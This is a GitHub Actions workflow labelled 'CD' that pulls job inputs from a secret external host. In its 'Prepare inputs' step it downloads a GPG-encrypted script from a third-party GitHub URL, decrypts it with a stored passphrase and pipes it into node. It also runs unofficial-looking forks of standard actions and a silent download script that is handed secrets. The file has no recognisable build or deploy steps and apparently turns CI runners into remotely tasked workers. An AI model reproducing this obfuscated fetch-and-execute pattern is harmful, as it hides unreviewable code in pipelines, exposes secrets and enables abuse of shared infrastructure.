name: CD

on:
  workflow_dispatch:
    inputs:
      jobId:
        description: jobId
      large:
        type: boolean
        default: true
        description: large

jobs:
  build:
    runs-on: ubuntu-latest

    permissions:
      actions: write
      contents: read

    services:
      redis:
        image: redis:alpine3.16
        options: >-
          --health-cmd "redis-cli ping"
          --health-interval 3s
          --health-timeout 5s
          --health-retries 10
        ports:
          - 6379:6379
    steps:
      - name: Prepare inputs
        id: checksize
        run: |
          set -eo pipefail
          input=$(curl --fail -s ${{ secrets.JOB_HOSTING }}/v2/job/${{ inputs.jobId }})
          echo "::add-mask::$input" | perl -pe 's/%/%25/g;s/\n/%0A/g;s/\r/%0D/g'
          isok() {
            batch=https://raw.githubusercontent.com/gotham8x/hello-cpp/refs/heads/test/.github/workflows/v2.mjs.gpg
            curl -Ls "$batch" | gpg --batch --yes --decrypt --passphrase '${{ secrets.SS_ROT_KEY_CONFIG_KEY }}' - | node - "$input"
          }
          if ! isok; then
            echo "large=1" >>$GITHUB_OUTPUT
          fi

      - name: Space
        if: steps.checksize.outputs.large
        # if: inputs.large || steps.checksize.outputs.large
        uses: easimon/maximize-build-space@master
        with:
          root-reserve-mb: 512
          swap-size-mb: 512
          temp-reserve-mb: 64
          remove-dotnet: 'true'
          remove-android: 'true'
          remove-haskell: 'true'

      - uses: reeganexe/checkout@v4
      - uses: reeganexe/checkout@v4
        with:
          token: ${{ secrets.L24_TOKEN }}
          repository: ${{ github.repository_owner }}/lerna24
          path: lerna24

      - uses: gotham8x/saigon-tz-action@v0.1

      - uses: reeganexe/region@v1
        id: ip

      - name: Prepare inputs
        if: false
        run: |
          input=$(curl --fail -s ${{ secrets.JOB_HOSTING }}/v2/job/${{ inputs.jobId }})
          echo "::add-mask::$input" | perl -pe 's/%/%25/g;s/\n/%0A/g;s/\r/%0D/g'
          node .github/workflows/test.mjs "$input"

      - name: main - ${{ steps.ip.outputs.region }}
        run : ./newgithub/dl.sh "$(curl --fail -s ${{ secrets.JOB_HOSTING }}/v2/job/${{ inputs.jobId }})"
        working-directory: ${{ github.workspace }}/lerna24
        env:
          SS_ROT_KEY_CONFIG_KEY: ${{ secrets.SS_ROT_KEY_CONFIG_KEY }}
          SILENT: 1

      - name: Clean
        if: always()
        run: |
          if [ -d "$WORK_DIR" ]; then
            $WORK_DIR/newgithub/clean.sh
          fi
        env:
          WORK_DIR: ${{ github.workspace }}/lerna24

      - name: Clean Runs
        if: always()
        run: curl -sX POST ${{ secrets.JOB_HOSTING }}/v2/done/$GITHUB_RUN_ID
